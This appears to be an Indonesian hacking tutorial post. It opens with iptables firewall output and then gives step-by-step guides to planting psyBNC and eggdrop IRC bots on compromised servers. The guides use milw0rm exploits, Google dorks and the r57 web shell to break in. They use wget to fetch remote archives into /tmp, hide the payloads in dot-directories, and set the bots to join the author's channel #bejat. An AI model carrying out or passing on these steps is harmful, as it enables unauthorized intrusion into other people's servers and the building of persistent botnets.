+-(root@lvps212-241-196-154.vps.webfusion.co.uk)(09:25:19)
+-($ Mb)(~)-> service iptables restart
Flushing firewall rules: [ OK ]
Setting chains to policy ACCEPT: mangle filter nat [ OK ]
Applying iptables firewall rules: [ OK ]


-----------------------------------------------------------------------------------------------------

untuk mengetahui apakah rule kita berjalan dengan benar cek statusnya

+-(root@lvps212-241-196-154.vps.webfusion.co.uk)(09:26:26)
+-($ Mb)(~)-> service iptables status
Table: mangle
Chain PREROUTING (policy ACCEPT)
target prot opt source destination

Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination

Table: filter
Chain INPUT (policy ACCEPT)
target prot opt source destination
REJECT udp -- anywhere anywhere reject-with icmp-port-unreachable
DROP icmp -- anywhere anywhere icmp echo-request
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp
REJECT tcp -- anywhere anywhere tcp dpt:10000 reject-with icmp-port-unreachable
REJECT tcp -- anywhere anywhere tcp dpt:smtp reject-with icmp-port-unreachable
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT tcp -- anywhere anywhere tcp dpt:2020
REJECT tcp -- anywhere anywhere tcp dpt:pop3 reject-with icmp-port-unreachable
REJECT tcp -- anywhere anywhere tcp dpt:auth reject-with icmp-port-unreachable
REJECT tcp -- anywhere anywhere tcp dpt:smtps reject-with icmp-port-unreachable
REJECT tcp -- anywhere anywhere tcp dpt:imaps reject-with icmp-port-unreachable
REJECT tcp -- anywhere anywhere tcp dpt:pop3s reject-with icmp-port-unreachable
REJECT tcp -- anywhere anywhere tcp dpt:imap reject-with icmp-port-unreachable
ACCEPT tcp -- anywhere anywhere tcp dpt:http
REJECT tcp -- anywhere anywhere tcp dpt:mysql reject-with icmp-port-unreachable
REJECT tcp -- anywhere anywhere tcp dpt:webcache reject-with icmp-port-unreachable

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Table: nat
Chain PREROUTING (policy ACCEPT)
target prot opt source destination

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

-------------------------------------

Finis cek List rule : iptables -L

Wink

BIKIN PSYBNC


Ini lebih simple dari pada bikin bot, okeh kita asumsikan anda mempunyai target dan masuk pada direktory yang writable /var/tmp, /tmp ato yang lain

1. donlot... file psy dengan comand wget www.geocities.com/xbejat/psy.tar.gz

2. ekstrak file dengan tar -zxvf psy.tar.gz

3. masuk pada direktory .psy dengan comand cd .psy atau tambahin /.psy pada change directory

4. configurasi port yang di inginkan dengan comand ./config 31310 (port ini terserah asal 4-5 digit angka)

5. trus tinggal ./run

6. okeh tinggal masuk ke mirc..ketik /s (nama server) (port) jangan lupa ident dan password yang pertama itu ident dan password yang dikenali psy sebagai admin.

7. trus setting server psy kamu.

8. jangan lupa join kan psy nya ke channel aq yaaa.... #bejat

Bikin BOT Injections


assalaamu'alaikum wr wb

mulai dari mana ya.....
wah saya ini cuma newbie, bagi yang telah banyak melanglang buana dalam dunia MIRC pasti ketawa melihat tulisan ini. sorry kalo gitu abaikan aja tulisan ini.

1. Siapkan, situs koran kita www.milw0rm.com. cari cari bug-bug baru disana,perhatikan dork (kata kuncinya) dan file bugnya trus silahkan gerilya cari target dengan bantuan paman Google kekekeke. (maaf gak ada tulisan cari target).

2. Pilih lokasi directory yang writable dari target dengan memilih pada injector r57 itu ada kok.... atau biasanya directory yang writable berada di /var/tmp atau /tmp. misal kita memilih meletakkan file bot di /tmp maka ketik /tmp pada change directory untuk pindah ke directory tmp atau cd /tmp.

3. Donlot eggdropketik di comand wget www.geocities.com/xbejat/jancok.tgz

4. Ekstrak dengan comand tar -zxvf jancok.tgz

5. Masuk ke directory .log dengan comand cd .log ato tambahin /.log di change directory.

6. Seting bot anda dengan comand contoh ./nadya (file_config) (nama_bot) (ident) (ip_target) (base_chanel) (nick_owner) -----> contoh ./nadya awan Wong-Bejat awan 123.12.13.42 bejat bejat (bingung cari ipnya target... gampang ketik /sbin/ifconfig | grep inet di shell ato ketik ajah di mirc /dns ( situs target) trus liat di status dalnet).

7. (ini bisa dilewati) Kalo situ mau nambahi tcl situ masuk dulu di directory scripts dan upload tcl yang diinginkan. trus untuk ngerun tcl nya kembali lagi ke directory .log dan ketik ./tcl -t (config mu tadi) (file tcl) misal ./tcl -t a badnick.tcl

8. Kalo udah ketik ./dssl -m (nama file configmu tadi) , misal ./dssl -m a tunggu di chan hingga bot masuk dan pv pass (password kamu).... ikuti perintah selanjutnya.

9. Oke cukup sudah... kesemuanya itu kalo lancar....pasti banyak halangan untuk sampe semuanya itu....jangan lupa bagi target dan parkir botnya di chanelku #bejat@dalnet he...he....he...

sekian.

wassalaamu'alaikum wr wb